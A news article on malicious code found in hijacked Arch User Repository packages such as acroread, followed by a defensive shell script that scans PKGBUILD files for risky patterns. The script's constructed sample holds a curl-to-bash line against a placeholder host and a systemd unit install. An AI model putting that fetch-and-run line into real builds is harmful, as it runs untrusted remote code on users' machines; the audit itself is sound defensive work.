Yet another incident that shows why you should never blindly trust packages from user-controlled software repositories.

Arch Linux, one of the most popular independently developed Linux distributions, has removed three packages from its community-driven Arch User Repository (AUR) after they were found to contain malicious code.

Arch Linux is a general-purpose GNU/Linux distribution focused on free and open-source software with strong community involvement. In addition to its official repositories, users often rely on the AUR for additional packages maintained by fellow users.

Because AUR packages are user-submitted, Arch maintainers have always advised users to carefully inspect the PKGBUILD and any .install files for suspicious commands before building and installing them.

Compromised PDF Viewer Found on Arch Linux AUR

On June 7, a malicious user nicknamed "xeactor" adopted an orphaned AUR package called acroread (a PDF viewer) and modified it to include malicious code.

According to the package's Git commit history, xeactor added code that uses curl to download a script from a remote server. That script then installs a persistent component that runs every 360 seconds and tampers with the system's systemd configuration.

The malicious script was designed to collect the following information from infected systems:

  • Date and time
  • Machine ID
  • Pacman package manager information
  • Output of the uname -a command
  • CPU information
  • Output of the systemctl list-units command

The collected data was posted to a Pastebin document.

Fortunately, the malicious modifications were discovered through code analysis before they could do serious damage. However, the attacker could have updated the payloads at any time to deliver more sophisticated malware.

Once the compromise was discovered, AUR maintainers quickly reverted the changes, suspended xeactor’s account, and identified two more packages that the same user had recently adopted and modified in the same way.

Additional Malicious Packages Removed

The AUR team removed the other two packages without publicly disclosing their names.

If you recently installed the "acroread" package, remove it from your system immediately.

While this particular incident did not pose a severe threat, it has once again highlighted the risks of relying on unvetted user-contributed packages.

In a comment on the Arch Linux mailing list, developer Giancarlo Razzolini wrote:

"I am surprised that this type of silly package takeover and malware introduction does not happen more often. This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves."

"Helpers that do everything automatically and users that don't pay attention, will have issues. You should use helpers even more so at your risk than the AUR itself."

Bottom line: With any user-maintained repository, always review the PKGBUILD and build scripts yourself before installing anything.
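A small pre-build audit that puts this advice into practice, added here as an example and not taken from the article or from the Arch project: it greps a PKGBUILD or .install file for the behaviours described above (downloads piped into a shell, network fetches outside the source=() array, writes to systemd unit directories) so a reviewer reads those lines first. The sample PKGBUILD is constructed and the hostnames in it are placeholders.

```shell
#!/bin/sh
# Added example: flag lines in a PKGBUILD/.install file that deserve a close
# look before running makepkg. A hit is not proof of malice, only a prompt to
# read that line and ask whether the package's purpose explains it.

audit_pkgbuild() {
    # Print each suspicious line as "<lineno>:<text>"; exit 0 if any were
    # found (grep semantics), 1 if the file contains none of the patterns.
    grep -nE \
        -e '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' \
        -e '^[[:space:]]*(curl|wget)[[:space:]]' \
        -e 'systemd/system|systemctl[[:space:]]+(enable|start|daemon-reload)' \
        -e '/(tmp|var/tmp)/[^[:space:]]*\.(sh|py)' \
        "$1"
}

count_findings() {
    # Number of flagged lines in a file (0 when nothing matched).
    audit_pkgbuild "$1" | wc -l | tr -d ' '
}

make_sample() {
    # Constructed sample: a package() function that fetches and runs a remote
    # script and drops a systemd unit, the pattern this audit should surface.
    cat > "$1" <<'EOF'
pkgname=example-viewer
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-viewer-1.0.tar.gz")
sha256sums=('SKIP')

build() {
    cd "$srcdir"
    make
}

package() {
    install -Dm755 example-viewer "$pkgdir/usr/bin/example-viewer"
    curl -s https://example.invalid/x | bash
    cp x.service /usr/lib/systemd/system/
}
EOF
}

tmp=$(mktemp)
make_sample "$tmp"
if audit_pkgbuild "$tmp"; then
    echo "review the flagged lines above before running makepkg"
else
    echo "no flagged patterns; still read the whole file"
fi
rm -f "$tmp"
```

Run it against a real download with `audit_pkgbuild ./PKGBUILD` and `audit_pkgbuild ./*.install`; the patterns are a starting point, so extend them for anything else you would not expect from the package.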
